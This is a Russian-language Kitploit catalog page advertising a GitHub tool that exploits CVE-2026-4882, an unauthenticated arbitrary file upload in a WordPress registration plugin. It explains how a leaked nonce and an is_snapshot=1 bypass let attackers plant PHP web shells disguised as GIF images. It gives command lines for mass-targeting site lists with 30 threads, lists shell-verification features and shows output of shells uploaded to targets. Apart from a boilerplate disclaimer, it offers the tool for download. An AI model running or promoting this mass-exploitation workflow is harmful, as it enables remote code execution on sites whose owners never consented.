Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-4882 — Пользовательская регистрация расширенных полей <= 1.6.20 - Неаутентифицированная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/xshadow-here/cve-2026-4882
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеRed Teaming
GitHubxshadow-here/cve-2026-4882

CVE-2026-4882

Пользовательская регистрация расширенных полей <= 1.6.20 - Неаутентифицированная произвольная загрузка файлов

Репозиторий
13 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-4882

User Registration Advanced Fields <= 1.6.20 - Неаутентифицированная произвольная загрузка файлов

Описание :

Плагин User Registration Advanced Fields для WordPress (версии до 1.6.20 включительно) уязвим к неаутентифицированной произвольной загрузке файлов через AJAX-действие uraf_profile_picture_upload_method_upload. Плагин раскрывает валидный nonce через wp_localize_script() на любой странице, содержащей форму регистрации, а использование параметра is_snapshot=1 полностью обходит проверку расширения файлов. Это позволяет неаутентифицированным злоумышленникам загружать произвольные файлы (например, PHP-веб-шеллы, замаскированные под GIF-изображения), которые сохраняются в wp-content/uploads/user_registration_uploads/temp-uploads/, что приводит к полному удаленному выполнению кода (RCE).

ИНФОРМАЦИЯ :

CVE-2026-4882

~ Оценка CVSS: 9.8 (Критическая)

~ Затронутые версии: <= 1.6.20

  • Исследователь : 0xd4rk5id3 - EnvoraSec

Использование :

Одиночная цель:

  • python3 shadow.py -u https://target.com -s shadow.php

Массовые цели:

  • python3 shadow.py -f targets.txt -s shadow.php -t 30

Интерактивный режим:

  • python3 shadow.py
  • введите имя файла с целями
  • введите количество потоков (1-50 максимум)

Возможности :

  • Многопоточность
  • Обработка ошибок
  • Автоматическое обнаружение nonce и ID формы
  • Сканирование главной страницы и sitemap (пользовательские пути регистрации)
  • Запасной вариант перебора ID формы
  • Автоматическое разрешение редиректов HTTP/HTTPS
  • Загрузка полиглот-шелла GIF89a
  • Проверка шелла
  • Автосохранение результатов в shell.txt

Вывод :

root@kitploit:~

╔══════════════════════════════════════════════════╗
║   CVE-2026-4882 — Full Auto Exploit              ║
║   User Registration Advanced Fields <= 1.6.20    ║
║   by: Shadow x Friska 😈🔥                      ║
╚══════════════════════════════════════════════════╝

  ═══ Interactive Mode ═══

  📄 Target file (e.g. targets.txt): list.txt
  ⚡ Threads 1-50 (default 30): 30

  🎯 Targets : 75
  📁 Shell   : shadow.php
  ⚡ Threads : 30
  💣 Brute   : 1-500

  🩷 [3/75] http://target.com
     → http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
  💀 [1/75] http://example.com — no nonce
  ❌ [4/75] http://example2.com — upload failed

Отказ от ответственности :

Этот инструмент предназначен только для образовательных целей и тестирования безопасности. Несанкционированное использование систем, которыми вы не владеете или на тестирование которых у вас нет разрешения, является незаконным.

Скачать инструмент